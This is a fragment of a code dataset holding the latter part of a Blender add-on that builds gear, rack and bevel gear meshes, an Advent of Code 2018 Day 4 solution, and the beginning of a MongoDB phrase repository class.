description=\"Backlash\")\n\n def draw(self, context):\n layout = self.layout\n\n box = layout.box()\n box.prop(self, 'UseMod')\n box.prop(self, 'Pinions')\n box.prop(self, 'Adv')\n box.prop(self, 'CloseObjs')\n box.prop(self, 'props')\n box.prop(self, 'TeethNs')\n box.prop(self, 'PitchRadiuss')\n box.prop(self, 'Thicknesss')\n box.prop(self, 'Widths')\n\n if self.Adv is True:\n boxa = layout.box()\n boxa.prop(self, 'PressureAngs')\n boxa.prop(self, 'HelicalAngs')\n boxa.prop(self, 'jeus')\n boxa.prop(self, 'Resolutions')\n boxa.prop(self, 'LongRess')\n\n if self.UseMod is False:\n boxb = layout.box()\n boxb.prop(self, 'Addendums')\n boxb.prop(self, 'Dedendums')\n boxb.prop(self, 'Fillets')\n\n if self.props is \"con\":\n boxc = layout.box()\n boxc.prop(self, 'Alphas')\n\n if self.Pinions is True:\n boxd = layout.box()\n boxd.prop(self, 'Ns')\n\n def execute(self, context):\n global PitchRadius, TeethN, PressureAng, Addendum, Dedendum, Fillet, Bevel, Resolution, Thickness\n global prop, Alpha, toDel, N, Pinion, CloseObj, jeu, LongRes, HelicalAng, Width\n\n # create mesh\n PitchRadius = self.PitchRadiuss\n TeethN = self.TeethNs\n PressureAng = self.PressureAngs\n Addendum = self.Addendums\n Dedendum = self.Dedendums\n Fillet = self.Fillets\n Bevel = 0\n Resolution = self.Resolutions\n Thickness = self.Thicknesss\n LongRes = self.LongRess\n HelicalAng = self.HelicalAngs\n Width = self.Widths\n Alpha = self.Alphas\n prop = self.props\n N = self.Ns\n Pinion = self.Pinions\n CloseObj = self.CloseObjs\n jeu = self.jeus\n\n if self.UseMod is True:\n module = 2.0 * PitchRadius / TeethN\n Addendum = module\n Dedendum = 1.25 * module\n Fillet = 0.3 * module\n Bevel = 0.25 * module\n if (prop == \"con\") and (Pinion is True):\n # Compute cone angle\n pTeethN = int(TeethN / N)\n N1 = TeethN/pTeethN\n Alpha = Alpha*pi/180.0\n Alpha1 = atan(sin(Alpha)/(N1+cos(Alpha)))\n Alpha = 2*(Alpha-Alpha1)*180/pi\n verts, faces = add_gear()\n if toDel == 1:\n #bpy.ops.object.mode_set(mode='OBJECT') #add 1712\n bpy.ops.object.delete()\n\n obj = create_mesh_object(context, verts, [], faces, \"Gear\")\n toDel = 1\n # duplique les dents spin\n bpy.ops.object.mode_set(mode='EDIT')\n if (prop == \"rac\"):\n DiametralPitch = 2*pi*PitchRadius/TeethN\n for k in range(TeethN):\n bpy.ops.mesh.duplicate_move(TRANSFORM_OT_translate={\"value\": (0, DiametralPitch, 0)})\n else:\n bpy.ops.mesh.spin(steps=TeethN, dupli=True, angle=2*pi, center=bpy.context.scene.cursor.location,axis=(0.0, 0.0, 1.0))\n bpy.ops.mesh.delete(type='VERT')\n bpy.ops.object.mode_set(mode='OBJECT')\n if Pinion is True:\n Rg = PitchRadius\n pTeethN = int(TeethN / N)\n Rp = PitchRadius * pTeethN / TeethN\n if (prop == \"con\"):\n Alpha = 2*Alpha1*180/pi\n PitchRadius = Rp\n TeethN = pTeethN\n HelicalAng = -HelicalAng\n verts, faces = add_gear(pinion=True)\n objp = create_mesh_object(context, verts, [], faces, \"Pinion\")\n # Move center\n paxis = (0.0, 0.0, 1.0)\n #changed obj to bpy.context. le 19/12\n #objectToSelect = bpy.data.objects[\"objectName\"]\n #objectToSelect.select_set(True)\n #bpy.context.view_layer.objects.active = obj #2012 selcted object suposed to be pinion\n print('Debug test') # to be displayed launch from terminal\n\n if (prop == \"nor\" or prop == \"con\"):\n pcenter = (bpy.context.object.location[0]+Rp+Rg, bpy.context.object.location[1], bpy.context.object.location[2])\n if (prop == \"cro\"):\n pcenter = (bpy.context.object.location[0]+Rg-Rp, bpy.context.object.location[1], bpy.context.object.location[2])\n if (prop == \"rac\"):\n pcenter = (bpy.context.object.location[0]+Rp, bpy.context.object.location[1], bpy.context.object.location[2])\n #bpy.context.view_layer.objects.active = objp #2012\n bpy.context.object.location = pcenter #changed objp to bpy.context. le 19/12\n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.spin(steps=TeethN, dupli=True, angle=2*pi, center=pcenter, axis=paxis)\n bpy.ops.mesh.delete(type='VERT')\n bpy.ops.object.mode_set(mode='OBJECT')\n if (prop == \"con\"):\n bpy.ops.transform.rotate(value=-self.Alphas*pi/180.0, orient_axis='Y')\n bpy.context.object.location[0] = -Rg # bpy.context.object.location[0] + Rg\n bpy.context.object.location[2] = Rp # bpy.context.object.location[2] + Rp\n return {'FINISHED'}\n\n\nclass INFO_MT_mesh_gear_add(bpy.types.Menu):\n # Define the \"Gears\" menu\n bl_idname = \"INFO_MT_mesh_gear_add\"\n bl_label = \"Gear\"\n\n def draw(self, context):\n layout = self.layout\n layout.operator_context = 'INVOKE_REGION_WIN'\n layout.operator(\"mesh.primitive_gear\", text=\"Mesh Gear\")\n # layout.operator(\"mesh.primitive_animate_gear\", text=\"Animate Gear\")\n\n\n# Define \"Extras\" menu\ndef menu_func(self, context):\n self.layout.operator(ObjectGear.bl_idname, text=\"Gear\", icon=\"PLUGIN\")\n\n\ndef register():\n bpy.utils.register_class(ObjectGear)\n bpy.types.VIEW3D_MT_mesh_add.append(menu_func)\n\n\ndef unregister():\n bpy.utils.unregister_class(ObjectGear)\n bpy.types.VIEW3D_MT_mesh_add.remove(menu_func)\n\nif __name__ == \"__main__\":\n register()\n\n\n# Create a new mesh (object) from verts/edges/faces.\n# verts/edges/faces ... List of vertices/edges/faces for the\n# new mesh (as used in from_pydata).\n# name ... Name of the new mesh (& object).\n\ndef create_mesh_object(context, verts, edges, faces, name):\n\n # Create new mesh\n mesh = bpy.data.meshes.new(name)\n\n # Make a mesh from a list of verts/edges/faces.\n mesh.from_pydata(verts, edges, faces)\n\n # Update mesh geometry after adding stuff.\n mesh.update()\n\n from bpy_extras import object_utils\n return object_utils.object_data_add(context, mesh, operator=None)\n\n\n####################################################################\n# Do The Gear\n####################################################################\n\ndef add_gear(pinion=False):\n global PitchRadius, Alpha, prop, N, Pinion, TeethN, HelicalAng\n\n ####################################################################\n # Main Gear\n ####################################################################\n\n if (prop == \"nor\" or pinion is True or prop == \"con\"):\n (verts, faces) = TheTooth(0, 0, piniont=pinion)\n if (prop == \"con\"):\n AlphaG = Alpha*pi/360.0\n verts = ConifyTooth(verts, AlphaG)\n\n if (prop == \"cro\" and pinion is False):\n (verts, faces) = TheTooth(0, 1)\n\n if (prop == \"rac\" and pinion is False):\n (verts, faces) = TheTooth(1, 0)\n\n return verts, faces\n\n\n####################################################################\n# CREATES THE BASE PROFILE\n####################################################################\n\ndef TheTooth(Rack, Crown, piniont=False):\n\n verts = []\n faces = []\n\n if (Rack == 1):\n (Vert, Norm) = RackOutline()\n else:\n (Vert) = ToothOutline(piniont)\n\n b = 0\n Thicn = Thickness / 2\n Psi = HelicalAng*pi/180.0\n # Special po les engrens droit le nombre de vertice est special\n if prop == \"nor\" or prop == \"con\" or piniont is True:\n ###################################################################\n # make thickness\n for i in range(LongRes):\n z = Thicn - (Thickness)*(i)/(LongRes-1)\n sq = z*tan(Psi)\n Phi = sq/PitchRadius\n\n for j in range(len(Vert)):\n p = Vert[j]\n\n x = p[0]\n y = p[1]\n verts.append((x*cos(Phi)+y*sin(Phi), -x*sin(Phi)+y*cos(Phi), z))\n\n ####################################################################\n # make Faces\n NV = len(Vert)\n NL = LongRes-1\n N2 = Resolution\n FVC = len(verts)\n\n for i in range(NL):\n for j in range(NV-1):\n faces.append((i*(NV)+j, i*(NV)+j+1, (i+1)*(NV)+j+1, (i+1)*(NV)+j))\n ####################################################################\n # make top\n p0 = verts[0]\n p1 = verts[NV-1]\n th0 = atan(p0[1]/p0[0])\n th1 = atan(p1[1]/p1[0])\n R = PitchRadius\n N = 2*Resolution\n Wid = PitchRadius-Width\n\n for i in range(N+1):\n th = (th1-th0)*i/(N)+th0\n verts.append(((R-Wid)*cos(th), (R-Wid)*sin(th), Thickness/2.0))\n verts.append((R*cos((th1+th0)/2.0), R*sin((th1+th0)/2.0), Thickness/2.0))\n\n for i in range(N2-1):\n faces.append((i, i+1, FVC+i+1, FVC+i))\n\n faces.append((N2-1, FVC+N+1, FVC+N2, FVC+N2-1))\n\n for i in range(2*nIntoth+N-1):\n faces.append((N2+i-1, N2+i, FVC+N+1))\n\n faces.append((FVC+N2, FVC+N+1, NV-N2, FVC+N2+1))\n\n for i in range(N2-1):\n faces.append((NV-N2+i, NV-N2+i+1, FVC+N2+i+2, FVC+N2+i+1))\n\n # make bottom\n F1 = NL*NV\n FVT = FVC\n FVC = len(verts)\n tha = th1\n th1 = -th0\n th0 = -tha\n\n for i in range(N+1):\n th = ((th1-th0)*i/(N)+th0)\n verts.append(((R-Wid)*cos(th), (R-Wid)*sin(th), -Thickness/2.0))\n verts.append((R*cos((th1+th0)/2.0), R*sin((th1+th0)/2.0), -Thickness/2.0))\n\n for i in range(N2-1):\n faces.append((F1+i, F1+i+1, FVC+i+1, FVC+i))\n\n faces.append((F1+N2-1, FVC+N+1, FVC+N2, FVC+N2-1))\n\n for i in range(2*nIntoth+N-1):\n faces.append((F1+N2+i-1, F1+N2+i, FVC+N+1))\n\n faces.append((FVC+N2, FVC+N+1, F1+NV-N2, FVC+N2+1))\n\n for i in range(N2-1):\n faces.append((F1+NV-N2+i, F1+NV-N2+i+1, FVC+N2+i+2, FVC+N2+i+1))\n\n # Close the mesh\n if CloseObj is True:\n for i in range(N):\n faces.append((FVC+i, FVC+i+1, FVT+i+1, FVT+i))\n\n # case crown and rack\n else:\n if prop == \"cro\":\n (verts, faces) = SolCrown(Vert)\n elif piniont is False:\n\n ####################################################################\n # First Vertices\n\n for i in range(Resolution+1):\n chi = (i/(1.0*Resolution))*pi/2.0\n z = Thicn-b*(1-cos(chi))\n sq = z*tan(Psi)\n\n for j in range(len(Vert)):\n p = Vert[j]\n m = Norm[j]\n x = p[0]+b*(1-sin(chi))*m[0]\n y = p[1]+b*(1-sin(chi))*m[1]\n verts.append((x, y - sq, z))\n\n for i in range(LongRes):\n z = Thicn - b - (Thickness-2.0*b) * (i+1) / LongRes\n sq = z*tan(Psi)\n\n for j in range(len(Vert)):\n p = Vert[j]\n x = p[0]\n y = p[1]\n verts.append((x, y - sq, z))\n\n for i in range(Resolution):\n chi = (1.0-(i+1) / (1.0*Resolution)) * pi / 2.0\n z = - Thicn + b * (1-cos(chi))\n sq = z*tan(Psi)\n\n for j in range(len(Vert)):\n p = Vert[j]\n m = Norm[j]\n x = p[0]+b*(1-sin(chi))*m[0]\n y = p[1]+b*(1-sin(chi))*m[1]\n verts.append((x, y - sq, z))\n\n ####################################################################\n # Then Faces\n NV = len(Vert)\n NL = 2*Resolution+LongRes\n FVC = len(verts)\n\n for i in range(NL):\n for j in range(NV-1):\n faces.append((i*(NV)+j, i*(NV)+j+1, (i+1)*(NV)+j+1, (i+1)*(NV)+j))\n\n ####################################################################\n # Add Width\n #\n # TOP\n\n p0 = verts[0]\n p1 = verts[NV-1]\n y0 = p0[1]\n y1 = p1[1]\n x0 = p0[0]\n N = 2*Resolution\n Wid = Width\n\n for i in range(N):\n y = (y1-y0)*i/(N-1)+y0\n verts.append(((x0-Wid), y, Thickness/2.0))\n verts.append((x0, (y1+y0)/2.0, Thickness/2.0))\n\n for i in range(N-1):\n faces.append((i, i+1, FVC))\n\n for i in range(Resolution-1):\n faces.append((i+N-1, i+N, FVC+i+1, FVC+i))\n\n faces.append((int(N+N/2-2), int(N+N/2-1), FVC+N, int(FVC+N/2-1)))\n faces.append((int(FVC+N/2-1), FVC+N, int(FVC+N/2)))\n\n for i in range(6*N):\n faces.append((int(N+N/2+i-1), int(N+N/2+i), FVC+N))\n\n faces.append((int(FVC+N/2), FVC+N, int(NV-N-N/2), int(NV-N-N/2+1)))\n\n for i in range(Resolution-1):\n faces.append((int(NV-N-N/2+i+1), int(NV-N-N/2+i+2), int(FVC+N/2+i+1), int(FVC+N/2+i)))\n\n for i in range(N-1):\n faces.append((NV-i-2, NV-i-1, FVC+N-1))\n\n # BOTTOM\n F1 = NL*NV\n FVT = FVC\n FVC = len(verts)\n ya = y1\n y1 = - y0\n y0 = - ya\n Wid = Width\n for i in range(N):\n y = (y1-y0)*i/(N-1)+y0\n verts.append(((x0-Wid), y, -Thickness/2.0))\n verts.append((x0, (y1+y0)/2.0, -Thickness/2.0))\n\n for i in range(N-1):\n faces.append((F1+i, F1+i+1, FVC))\n\n for i in range(Resolution-1):\n faces.append((F1+i+N-1, F1+i+N, FVC+i+1, FVC+i))\n\n faces.append((int(F1+N+N/2-2), int(F1+N+N/2-1), FVC+N, int(FVC+N/2-1)))\n faces.append((int(FVC+N/2-1), FVC+N, int(FVC+N/2)))\n\n for i in range(6*N):\n faces.append((int(F1+N+N/2+i-1), int(F1+N+N/2+i), FVC+N))\n\n faces.append((int(FVC+N/2), FVC+N, int(F1+NV-N-N/2), int(F1+NV-N-N/2+1)))\n\n for i in range(Resolution-1):\n faces.append((int(F1+NV-N-N/2+i+1), int(F1+NV-N-N/2+i+2), int(FVC+N/2+i+1), int(FVC+N/2+i)))\n\n for i in range(N-1):\n faces.append((F1+NV-i-2, F1+NV-i-1, FVC+N-1))\n\n # Close the mesh\n if CloseObj is True:\n for i in range(N):\n faces.append((FVC+i, FVC+i+1, FVT+i+1, FVT+i))\n # if(Rack==1):\n # faces.append((F1+NV-2, FVC, FVT, NV-2))\n # faces.append((F1+NV-N, FVC+N, FVT+N, NV-N))\n\n return verts, faces\n\n\n####################################################################\n# Deform base profile to cone\n####################################################################\n\ndef ConifyTooth(verts, Alpha):\n\n vertsr = []\n\n R = PitchRadius\n Zo = Thickness/2.0\n h = R/tan(Alpha)\n for v in verts:\n x = v[0]\n y = v[1]\n z = v[2]+Zo\n\n r = sqrt(x*x+y*y)\n phi = atan(y/x)\n\n Rr = R + (r-R)*cos(Alpha)\n Rz = (r-R)*sin(Alpha)\n\n Mod = sqrt(Rr*Rr+(Rz-h)*(Rz-h))\n\n rc = Rr - z * Rr/Mod\n zc = Rz + z * (h-Rz)/Mod\n\n vertsr.append((rc*cos(phi), rc*sin(phi), zc))\n\n return vertsr\n\n\n####################################################################\n# CREATES THE BASE INVOLUTE PROFILE\n####################################################################\n\ndef ToothOutline(pinion=False):\n global nIntoth, ax, Fillet\n\n ####################################################################\n # Compute ;ù@j_{[#\n #\n\n Ag = PressureAng * pi / 180.0\n if prop == \"cro\" and pinion is False:\n # page T23\n module = 2.0 * PitchRadius / TeethN\n # Cas la distance entraxe est fixé on corrige la longueur dent\n # Pteeth=int(TeethN/N)\n # x=PitchRadius*(1-Pteeth/TeethN)\n # y=(ax/module)-(TeethN-Pteeth)/2\n # alphaw=acos((TeethN-Pteeth)*cos(Ag)/(2*y+TeethN-Pteeth))\n # x=(TeethN-Pteeth)*(tan(alphaw)-alphaw-tan(Ag)+Ag)/(2*tan(Ag))\n x = 0\n Bottom = PitchRadius - (1-x) * module\n Ded = Bottom\n Add = Bottom + (2.25-x) * module\n bk = 1 / jeu\n Fillet = 0\n else:\n Bottom = PitchRadius - Dedendum - Fillet\n Ded = PitchRadius - Dedendum\n Add = PitchRadius + Addendum\n bk = jeu\n Base = PitchRadius * cos(Ag)\n DiametralPitch = TeethN/(2.0*PitchRadius)\n # ToothThickness = 1.5708/DiametralPitch\n CircularPitch = pi / DiametralPitch\n Theta0 = CircularPitch/(PitchRadius*2.0)\n\n # solve for involute thickness\n csphi = bk/cos(Ag)\n csphi = csphi*csphi\n csded = (Ded/PitchRadius)*(Ded/PitchRadius)/(cos(Ag)*cos(Ag))\n # csbevel = (Add/PitchRadius)*(Add/PitchRadius)/(cos(Ag)*cos(Ag))\n th = 0\n thd = 0\n aeqx = 0\n aeqDed = 0\n Precision = 400\n for i in range(Precision):\n tx = (i/Precision) * (pi/4)\n ft = ((cos(tx)+tx*sin(tx)))*((cos(tx)+tx*sin(tx))) + ((sin(tx)-tx*cos(tx))) * ((sin(tx)-tx*cos(tx)))\n aeqxl = aeqx\n aeqDedl = aeqDed\n aeqx = ft - csphi\n aeqDed = ft - csded\n if i > 1:\n if ((aeqx*aeqxl) <= 0):\n th = tx\n break\n if ((aeqDed*aeqDedl) <= 0):\n thd = tx\n\n txx = Theta0/2 - atan((-sin(th)+th*cos(th))/(cos(th)+th*sin(th)))\n if thd == 0:\n txd = atan(tan(txx)*Base/Ded)\n else:\n txd = txx + atan((-sin(thd)+thd*cos(thd))/(cos(thd)+thd*sin(thd)))\n # fillet angle\n thf = atan(Fillet/Bottom)\n txf = txd+thf\n\n '''if prop==\"cro\" and pinion==False :\n txx = - txx'''\n\n ####################################################################\n # Mesh\n #\n Nr = Resolution\n points = []\n\n # bottom of tooth\n points.append([Bottom*cos(Theta0), Bottom*sin(Theta0)])\n\n # Fillet\n xc = Ded*cos(txf)\n yc = Ded*sin(txf)\n Aw = pi/2.0 + txd - txf\n for i in range(Nr-1):\n thv = (Aw)*(i+1)/(Nr) + pi + txf\n points.append([xc + Fillet*cos(thv), yc + Fillet*sin(thv)])\n\n # Tooth Involute\n Theta5 = 0\n nIntoth = 0\n dteta = pi/(TeethN*50*Resolution)\n dref = (Add-Ded)/(3*Nr)\n az = xc + Fillet*cos(thv)\n bz = yc + Fillet*sin(thv)\n Rl = sqrt(az*az+bz*bz)\n thv = txx+Theta0/2\n for i in range(5000):\n sx = Base*(cos(thv)+thv*sin(thv))\n sy = -Base*(sin(thv)-thv*cos(thv))\n if sx > Ded:\n apointsx = sy * sin(txx)+sx*cos(txx)\n apointsy = sx * sin(txx)+sy*cos(txx)\n R = sqrt(apointsx*apointsx+apointsy*apointsy)\n if R > Add or apointsy <= 0:\n break\n if (R-Rl) > dref:\n Rl = R\n points.append([apointsx, apointsy])\n nIntoth = nIntoth + 1\n Theta5 = atan(apointsy/apointsx)\n thv = thv + dteta\n\n # Tooth Top\n for i in range(Nr-1):\n thv = Theta5 * (1-(i+1)/Nr)\n points.append([Add*cos(thv), Add*sin(thv)])\n\n # Mirrors\n Nr = len(points)\n for i in range(Nr):\n P = points[Nr-1-i]\n points.append([P[0], -P[1]])\n\n return points\n\n\n####################################################################\n# CREATES THE BASE RACK PROFILE\n####################################################################\n\ndef RackOutline():\n\n ####################################################################\n # Basic Math computations: QUotes\n #\n X = {\n 'Bottom': - Dedendum - Fillet,\n 'Ded': - Dedendum,\n 'Bevel': Addendum - Bevel,\n 'Add': Addendum\n }\n\n ####################################################################\n # Basic Math computations: Angles\n #\n DiametralPitch = TeethN/(2*PitchRadius)\n ToothThickness = 1.5708/DiametralPitch\n CircularPitch = pi / DiametralPitch\n Pa = PressureAng*pi/180.0\n yA1 = ToothThickness/2.0\n yA2 = (-X['Ded']+Fillet*sin(Pa))*tan(Pa)\n yA3 = Fillet*cos(Pa)\n\n A = {\n 'y0': CircularPitch/2.0,\n 'y1': yA1 + yA2 + yA3,\n 'y2': yA1 + yA2,\n 'y3': yA1 - (X['Add']-Bevel) * tan(Pa),\n 'y4': yA1 - (X['Add']-Bevel) * tan(Pa) - cos(Pa) / (1-sin(Pa)) * Bevel\n }\n\n ####################################################################\n # Profiling\n #\n N = Resolution\n points = []\n normals = []\n # Top half bottom of tooth\n for i in range(2*N):\n y = (A['y1'] - A['y0'])*i/(2*N-1) + A['y0']\n points.append([X['Bottom'], y])\n normals.append([-1.0, -0.0])\n\n # Bottom Fillet\n xc = X['Ded']\n yc = A['y1']\n Aw = pi/2.0 - Pa\n for i in range(N):\n th = (Aw)*(i+1)/(N) + pi\n points.append([xc + Fillet*cos(th), yc + Fillet*sin(th)])\n normals.append([cos(th), sin(th)])\n\n # Straight part\n Xded = X['Ded'] - Fillet*sin(Pa)\n for i in range(4*N):\n x = (X['Bevel']-Xded)*(i+1)/(4*N) + Xded\n points.append([x, yA1-tan(Pa)*x])\n normals.append([-sin(Pa), -cos(Pa)])\n\n # Tooth Bevel\n rA = Bevel/(1-sin(Pa))\n xc = X['Add'] - rA\n yc = A['y4']\n for i in range(N):\n th = (-pi/2.0+Pa)*(i+1)/(N) + pi/2.0-Pa\n points.append([xc + rA*cos(th), yc + rA*sin(th)])\n normals.append([-cos(th), -sin(th)])\n\n # Tooth Top\n for i in range(N):\n y = -A['y4']*(i+1)/(N) + A['y4']\n points.append([X['Add'], y])\n normals.append([-1.0, 0.0])\n\n # Mirrors this!\n N = len(points)\n for i in range(N-1):\n P = points[N-2-i]\n points.append([P[0], -P[1]])\n V = normals[N-2-i]\n normals.append([V[0], -V[1]])\n\n return points, normals\n\n\n####################################################################\n# CREATES THE BASE CROWN INVOLUTE\n####################################################################\n\ndef CrownOutline():\n\n ####################################################################\n # Basic Math computations: Radii\n #\n R = {\n 'Bottom': PitchRadius * cos(PressureAng*pi/180.0),\n 'Base': PitchRadius * cos(PressureAng*pi/180.0) + Fillet,\n 'Ded': PitchRadius + Dedendum\n }\n\n ####################################################################\n # Basic Math computations: Angles\n #\n DiametralPitch = TeethN/(2*PitchRadius)\n ToothThickness = 1.5708/DiametralPitch\n CircularPitch = pi / DiametralPitch\n\n U1 = sqrt((1-cos(PressureAng*pi/180.0))/cos(PressureAng*pi/180.0))\n U2 = sqrt(R['Ded']*R['Ded']/(R['Base']*R['Base'])-1)\n\n ThetaA1 = atan((sin(U1)-U1*cos(U1))/(cos(U1)+U1*sin(U1)))\n ThetaA2 = atan((sin(U2)-U2*cos(U2))/(cos(U2)+U2*sin(U2)))\n ThetaA3 = ThetaA1 + ToothThickness/(PitchRadius*2.0)\n\n A = {\n 'Theta0': CircularPitch/(PitchRadius*2.0),\n 'Theta1': (ThetaA3 + Fillet/R['Base']),\n 'Theta2': ThetaA3,\n 'Theta3': ThetaA3 - ThetaA2,\n 'Theta4': ThetaA3 - ThetaA2 - Bevel/R['Ded']\n }\n\n M = A['Theta0']\n A['Theta0'] = 0\n A['Theta1'] = A['Theta1']-M\n A['Theta2'] = A['Theta2']-M\n A['Theta3'] = A['Theta3']-M\n A['Theta4'] = A['Theta4']-M\n\n ####################################################################\n # Profiling\n #\n N = Resolution\n apoints = []\n anormals = []\n\n # Top half top of tooth\n for i in range(2*N):\n th = (A['Theta1'] - A['Theta0'])*i/(2*N-1) + A['Theta0']\n apoints.append([R['Bottom']*cos(th), R['Bottom']*sin(th)])\n anormals.append([cos(th), sin(th)])\n\n # Bottom Bevel\n xc = R['Base']*cos(A['Theta1'])\n yc = R['Base']*sin(A['Theta1'])\n Aw = pi/2.0 + A['Theta2'] - A['Theta1']\n for i in range(N):\n th = (Aw)*(i+1)/(N) + pi + A['Theta1']\n apoints.append([xc + Fillet*cos(th), yc + Fillet*sin(th)])\n anormals.append([-cos(th), -sin(th)])\n\n # Tooth Involute\n for i in range(4*N):\n r = (R['Ded'] - R['Base'])*(i+1)/(4*N) + R['Base']\n u = sqrt(r*r/(R['Base']*R['Base'])-1)\n xp = R['Base']*(cos(u)+u*sin(u))\n yp = - R['Base']*(sin(u)-u*cos(u))\n apoints.append([xp*cos(A['Theta2'])-yp*sin(A['Theta2']), +xp*sin(A['Theta2'])+yp*cos(A['Theta2'])])\n anormals.append([sin(u), cos(u)])\n\n # Tooth Bevel\n auxth = -u\n auxth = auxth + ThetaA3 + pi/2.0\n # m = tan(auxth)\n P0 = apoints[len(apoints)-1]\n rA = Bevel/(1-cos(auxth-A['Theta4']))\n xc = P0[0] - rA*cos(auxth)\n yc = P0[1] - rA*sin(auxth)\n for i in range(N):\n th = (A['Theta4'] - auxth)*(i+1)/(N) + auxth\n apoints.append([xc + rA*cos(th), yc + rA*sin(th)])\n anormals.append([cos(th), sin(th)])\n\n # Tooth Top\n P0 = apoints[len(apoints)-1]\n A['Theta4'] = atan(P0[1]/P0[0])\n Ra = sqrt(P0[0]*P0[0]+P0[1]*P0[1])\n for i in range(N):\n th = (-M - A['Theta4'])*(i+1)/(N) + A['Theta4']\n apoints.append([Ra*cos(th), Ra*sin(th)])\n anormals.append([cos(th), sin(th)])\n\n points = []\n normals = []\n N = len(apoints)\n for i in range(N):\n points.append(apoints[N-1-i])\n normals.append(anormals[N-1-i])\n\n # Mirrors this!\n N = len(points)\n for i in range(N-1):\n P = points[N-2-i]\n points.append([P[0], -P[1]])\n V = normals[N-2-i]\n normals.append([V[0], -V[1]])\n\n return points, normals\n\n\n######################################################\n# Mesh the crown\n######################################################\ndef SolCrown(Vert):\n\n vertcs = []\n facecs = []\n\n Thicn = Thickness / 2\n Psi = HelicalAng*pi / 180.0\n\n ###################################################################\n # make thickness\n for i in range(LongRes):\n z = Thicn - (Thickness)*(i)/(LongRes-1)\n sq = z*tan(Psi)\n Phi = sq/PitchRadius\n\n for j in range(len(Vert)):\n p = Vert[j]\n\n x = p[0]\n y = p[1]\n vertcs.append((x*cos(Phi)+y*sin(Phi), -x*sin(Phi)+y*cos(Phi), z))\n\n ####################################################################\n # make Faces\n NV = len(Vert)\n NL = LongRes-1\n N2 = Resolution\n FVC = len(vertcs)\n\n for i in range(NL):\n for j in range(NV-1):\n facecs.append((i*(NV)+j, i*(NV)+j+1, (i+1)*(NV)+j+1, (i+1)*(NV)+j))\n ####################################################################\n # make top\n p0 = vertcs[0]\n p1 = vertcs[NV-1]\n th0 = atan(p0[1]/p0[0])\n th1 = atan(p1[1]/p1[0])\n R = PitchRadius\n N = 2*Resolution\n Wid = -Width\n\n for i in range(N-2):\n th = (th1-th0)*i/(N-3)+th0\n vertcs.append(((R-Wid)*cos(th), (R-Wid)*sin(th), Thickness/2.0))\n\n for i in range(nIntoth+N2):\n facecs.append((i, i+1, FVC))\n\n for i in range(N-3):\n facecs.append((nIntoth+N2+i, nIntoth+N2+i+1, FVC+i+1, FVC+i))\n\n NN = NV-nIntoth-N2-1\n for i in range(nIntoth+N2):\n facecs.append((NN+i, NN+i+1, FVC+N-3))\n\n # make bottom\n F1 = NL*NV\n FVT = FVC\n FVC = len(vertcs)\n tha = th1\n th1 = -th0\n th0 = -tha\n\n for i in range(N-2):\n th = ((th1-th0)*i/(N-3)+th0)\n vertcs.append(((R-Wid)*cos(th), (R-Wid)*sin(th), -Thickness/2.0))\n\n for i in range(nIntoth+N2):\n facecs.append((F1+i, F1+i+1, FVC))\n\n for i in range(N-3):\n facecs.append((F1+nIntoth+N2+i, F1+nIntoth+N2+i+1, FVC+i+1, FVC+i))\n\n NN = F1+NV-nIntoth-N2-1\n for i in range(nIntoth+N2):\n facecs.append((NN+i, NN+i+1, FVC+N-3))\n\n # Close the mesh\n if CloseObj is True:\n for i in range(N-3):\n facecs.append((FVC+i, FVC+i+1, FVT+i+1, FVT+i))\n\n return vertcs, facecs\n","sub_path":"Add_Mesh_Gear.py","file_name":"Add_Mesh_Gear.py","file_ext":"py","file_size_in_byte":32776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"460163590","text":"def max_index(x):\n\treturn 5 - x\n\ndef most_min_asleep():\n\twith open(\"day4.txt\", 'r') as f:\n\t\tshifts = sorted([line.strip(\"\\n\") for line in f])\n\t\tguard_asleep = {}\n\t\tmins_per_guard = {}\n\t\tfor line in shifts:\n\t\t\tif '#' in line:\n\t\t\t\tid_index = line.find('#')\n\t\t\t\tguard_id = line[id_index + 1:id_index + line[id_index:].find(' ')]\n\t\t\telif \"falls asleep\" in line:\n\t\t\t\tsleep_start = int(line[15:17])\n\t\t\telse:\n\t\t\t\tmins_asleep = int(line[15:17]) - sleep_start\n\t\t\t\tif guard_id in guard_asleep:\n\t\t\t\t\tguard_asleep[guard_id] += mins_asleep\n\t\t\t\telse:\n\t\t\t\t\tguard_asleep[guard_id] = mins_asleep\n\t\t\t\t\tmins_per_guard[guard_id] = [0 for i in range(60)]\n\t\t\t\tfor minute in range(mins_asleep):\n\t\t\t\t\tmins_per_guard[guard_id][sleep_start + minute] += 1\n\n\t\tmost_sleep_guard_id = max(guard_asleep, key=guard_asleep.get)\n\t\tmost_common_min = max(range(60), key=lambda n: mins_per_guard[most_sleep_guard_id][n])\n\n\t\tprint(most_sleep_guard_id, most_common_min)\n\t\tprint(\"Product =\", int(most_sleep_guard_id) * most_common_min)\n\n\t\t# -- PART 2 --\n\t\tmax_repeats = 0\n\t\tfor guard in mins_per_guard:\n\t\t\tif max(mins_per_guard[guard]) > max_repeats:\n\t\t\t\tmax_repeats = max(mins_per_guard[guard])\n\t\t\t\tmost_repeated_min = max(range(60), key=lambda n: mins_per_guard[guard][n])\n\t\t\t\tmax_guard = guard\n\n\t\tprint(max_guard, most_repeated_min)\n\t\tprint(\"Product =\", int(max_guard) * most_repeated_min)\n\nmost_min_asleep()","sub_path":"aoc-2018/2018 Day 4.py","file_name":"2018 Day 4.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"595334488","text":"from pymongo import MongoClient\n\nfrom models.phrase import Phrase\n\n\nclass PhraseRepository(object):\n\n def __init__(self, url, port):\n \"\"\"\n :type url: str\n :type port: int\n \"\"\"\n self.client = MongoClient(url,\n port)\n\n # username=user,\n # password=password,\n # authMechanism='SCRAM-SHA-256')\n self.database = self.client.bunq_csr\n self.phrase_collection = self.database.phrases\n\n def create(self, phrase):\n \"\"\"\n :type phrase: Phrase\n :rtype: Phrase\n \"\"\"\n if phrase is not None:\n self.phrase_collection.insert(phrase.get_as_json())\n else:\n raise Exception(\"Nothing to save, because project parameter is None\")\n\n def read(self, phrase_id=None):\n \"\"\"\n :rtype: list[Phrase]\n \"\"\"\n if phrase_id is None:\n return self.phrase_collection.find({})\n else:\n return self.phrase_collection.find({\"_id\": 